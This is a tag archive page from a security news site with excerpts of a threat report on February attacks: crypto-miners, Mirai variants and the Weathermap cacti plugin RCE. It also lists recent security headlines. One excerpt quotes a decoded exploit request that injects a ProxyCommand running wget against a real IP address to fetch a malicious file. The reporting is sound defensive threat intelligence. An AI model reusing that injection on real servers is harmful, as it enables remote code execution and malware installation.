Tag: Network Weathermap cacti plug-in
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is: oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit. Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze. Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739) Another known…
Read MoreConclusion Continuing the trend from January, threat actors in February delivered crypto-miners and Mirai variants. Most of the vulnerabilities exploited in February are not new, however, they are known vulnerabilities in popular applications and systems. In these cases, a threat actor is not looking for a specific target, but instead tries to exploit as many…
Read MoreRecent Posts
- Microsoft’s Patch Release Covers Five Exploited Zero-Day Bugs, Not Four: Researcher
- AWS CEO ‘Bullish’ On Homemade Chip Future: ‘We Can Optimize Like Crazy’
- Cisco Releases Security Updates for Cisco Smart Licensing Utility | CISA
- Ivanti fixes maximum severity RCE bug in Endpoint Management software
- New PIXHELL acoustic attack leaks secrets from LCD screen noise